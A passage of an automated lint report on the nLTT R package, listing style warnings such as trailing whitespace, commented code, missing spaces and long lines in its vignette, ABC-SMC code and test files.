^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:23:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L23) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:30:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L30) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:35:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L35) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:41:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L41) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:44:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L44) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:48:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L48) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:52:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L52) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:59:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L59) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:64:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L64) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:72:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L72) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:75:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L75) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:79:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L79) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:83:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L83) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:91:1:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L91) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/ABC_SMC.R:280:26:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/R/ABC_SMC.R#L280) *style:* **Trailing whitespace is superfluous.**\n```r\n​  #check data type of phy \n                         ^\n```\n[R/ABC_SMC.R:287:1:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/R/ABC_SMC.R#L287) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:293:5:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/R/ABC_SMC.R#L293) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(parameters[2] < 0) {\n    ^\n```\n[R/ABC_SMC.R:295:24:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/R/ABC_SMC.R#L295) *style:* **Trailing whitespace is superfluous.**\n```r\n​    stop(\"mcmc_nltt: \", \n                       ^\n```\n[R/ABC_SMC.R:297:20:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/R/ABC_SMC.R#L297) *style:* **Commas should always have a space after.**\n```r\n​     \"but mu was \",parameters[2],\" instead\")\n                   ^\n```\n[R/ABC_SMC.R:297:34:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/R/ABC_SMC.R#L297) *style:* **Commas should always have a space after.**\n```r\n​     \"but mu was \",parameters[2],\" instead\")\n                                 ^\n```\n[R/ABC_SMC.R:340:1:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/R/ABC_SMC.R#L340) *style:* **Trailing whitespace is superfluous.**\n```r\n​        \n^~~~~~~~\n```\n[R/ABC_SMC.R:341:11:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/R/ABC_SMC.R#L341) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if(parameters[j] >= 0 & parameters[1] > 0) {        \n          ^\n```\n[R/ABC_SMC.R:341:52:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/R/ABC_SMC.R#L341) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​        if(parameters[j] >= 0 & parameters[1] > 0) {        \n                                                   ^\n```\n[R/ABC_SMC.R:341:53:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/R/ABC_SMC.R#L341) *style:* **Trailing whitespace is superfluous.**\n```r\n​        if(parameters[j] >= 0 & parameters[1] > 0) {        \n                                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:343:1:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/R/ABC_SMC.R#L343) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_calculate_weight.R:7:6:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L7) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in 1:2) {\n     ^\n```\n[tests/testthat/test_calculate_weight.R:12:20:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​    dunif(x[1], min=0, max=1000) *\n                  ~^~\n```\n[tests/testthat/test_calculate_weight.R:12:27:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​    dunif(x[1], min=0, max=1000) *\n                         ~^~\n```\n[tests/testthat/test_calculate_weight.R:13:20:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​    dunif(x[2], min=0, max=1000) }\n                  ~^~\n```\n[tests/testthat/test_calculate_weight.R:13:27:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​    dunif(x[2], min=0, max=1000) }\n                         ~^~\n```\n[tests/testthat/test_calculate_weight.R:13:34:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L13) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​    dunif(x[2], min=0, max=1000) }\n                                 ^\n```\n[tests/testthat/test_calculate_weight.R:14:1:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L14) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_calculate_weight.R:16:1:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L16) *style:* **lines should not be more than 80 characters.**\n```r\n​    calculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:16:49:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L16) *style:* **Put spaces around all infix operators.**\n```r\n​    calculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n                                               ~^~\n```\n[tests/testthat/test_calculate_weight.R:16:92:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L16) *style:* **Commented code should be removed.**\n```r\n​    calculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n                                                                                           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L17) *style:* **lines should not be more than 80 characters.**\n```r\n​    calculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:17:49:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​    calculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n                                               ~^~\n```\n[tests/testthat/test_calculate_weight.R:20:1:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_calculate_weight.R:22:1:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L22) *style:* **lines should not be more than 80 characters.**\n```r\n​    calculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:22:49:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​    calculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n                                               ~^~\n```\n[tests/testthat/test_calculate_weight.R:22:90:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​    calculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n                                                                                         ^\n```\n[tests/testthat/test_calculate_weight.R:23:1:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L23) *style:* **lines should not be more than 80 characters.**\n```r\n​    calculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:23:49:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​    calculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n                                               ~^~\n```\n[tests/testthat/test_calculate_weight.R:26:1:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_calculate_weight.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_calculate_weight.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:29:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                           ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:32:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Commas should always have a space after.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:7:37:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                   ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:41:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Commas should always have a space after.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                        ^\n```\n[tests/testthat/test_mcmc_nltt.R:7:44:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                          ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:49:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Commas should always have a space after.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                ^\n```\n[tests/testthat/test_mcmc_nltt.R:7:55:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                     ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:60:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Commas should always have a space after.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                           ^\n```\n[tests/testthat/test_mcmc_nltt.R:7:62:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:29:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                           ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:32:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Commas should always have a space after.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:8:37:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                   ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:41:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Commas should always have a space after.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                        ^\n```\n[tests/testthat/test_mcmc_nltt.R:8:44:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                          ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:49:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Commas should always have a space after.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                ^\n```\n[tests/testthat/test_mcmc_nltt.R:8:55:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                     ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:60:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Commas should always have a space after.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                           ^\n```\n[tests/testthat/test_mcmc_nltt.R:8:62:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:24:1:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L24) *style:* **lines should not be more than 80 characters.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:24:26:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:32:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:36:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                   ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:42:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:49:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:55:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                      ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:65:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                               ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:24:72:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                       ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:78:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:24:84:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                   ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:92:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                          ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:24:95:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                              ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:100:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:30:1:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L30) *style:* **lines should not be more than 80 characters.**\n```r\n​    